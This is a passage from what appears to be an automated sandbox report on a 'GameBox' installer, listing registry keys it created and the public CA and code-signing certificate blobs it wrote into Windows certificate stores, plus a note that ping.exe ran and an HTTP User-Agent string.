948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
